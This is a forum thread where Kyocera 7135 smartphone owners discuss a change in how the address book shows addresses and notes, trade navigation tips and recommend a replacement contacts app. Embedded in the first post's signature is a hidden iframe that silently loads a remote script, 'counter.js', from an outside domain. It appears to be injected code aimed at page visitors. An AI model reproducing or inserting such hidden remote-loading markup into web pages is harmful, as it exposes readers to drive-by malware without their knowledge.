+ Reply to Thread

7135 Address Book (Change or Problem?)

I just noticed that when going into a persons name the address now shows up under the phone number (used to show up just below the name then showed the phone numbers).

Anyone else getting this result?

Thank you.
    Drew<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    The one who dies with the most toys WINS :-)

ok - maybe it's the same order, but more room than normal between the name and phone numbers...

Any thoughts?
    The one who dies with the most toys WINS :-)

I think that's just the way Kyocera's tweaked version of the OS shows it.
    I find that believing the universe spontaneously generated, developed self-governing laws, and produced intelligent life all by random, purposeless, material events requires greater faith than I am able to muster.

I noticed this, too. In fact, I got really worried that I had lost all of my addresses when I was looking through my address book with the keypad.

Using the up/down button to naviagte the address book, pressing OK to select an entry, and then using the up/down button to scroll through the entry, only allows you to select phone/contact info. You need to use the stylus to tap on the down arrow to get to the address or any other additional information.

I was very happy to see that I didn't lose my addresses from my old Visor.

lou
    OCpDa
    I do find this feature change to be a negative. I put lots of info in Notes attached to Address book listings. If I've got driving directions in the note I've got to use the onscreen arrow down to see them instead of the hard scroll key. I can't imagine why they did that. Also, once you do scroll down there are large spaced between the data so you have to scroll down again to see the notes.

Can anyone recommend a good replacement Address book. I hate the idea odf spending the $$ and capacity but this change is not getting any easier for me to accept as time passes.

Originally posted by lou
    Can anyone recommend a good replacement Address book. I hate the idea odf spending the $$ and capacity but this change is not getting any easier for me to accept as time passes.
    I have always thought that Chapura Key Contacts the best address book replacement... but for viewing purposes only with the 7135, and not dialing (they don't yet have support for the 7135's up/down/ok button... you pretty much have to use a stylus to dial from it). It will sync up just about any field you use in Outlook (assuming you use Outlook) and display it all... including any notes (which can be a lot longer than the default address book, and you can scroll thru them with just the up/down buttons).
    Please visit my picture site: Robert-O-Rama :)

Originally posted by superdave
    Using the up/down button to naviagte the address book, pressing OK to select an entry, and then using the up/down button to scroll through the entry, only allows you to select phone/contact info. You need to use the stylus to tap on the down arrow to get to the address or any other additional information.
    You don't need the stylus to get to the address information. Scroll through your address book using the up/down key. Hit OK on the contact you want to view. Hit OK again to see the full listing. If you want to see notes or details or anything else, tap on the choices at the bottom of the screen. I use my thumb to tap on the notes button to read notes. And I have fat fingers.

If you want to dial or create an e-mail from the address book, scroll to the contact and hit OK. Use the up/down button to go to the number or e-mail address you want and hit the green phone (send) button.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Fully Converged
    Thanks Nick; that makes good sense.
    From the Middle of the Sea ;-)

wwk
    ... I thought this was a pain at first, too, as I often put driving directions in the Note field, too... but I like the suggestion above, and if you set the Notes font to large it's as easy to read as it used to be in the old OS.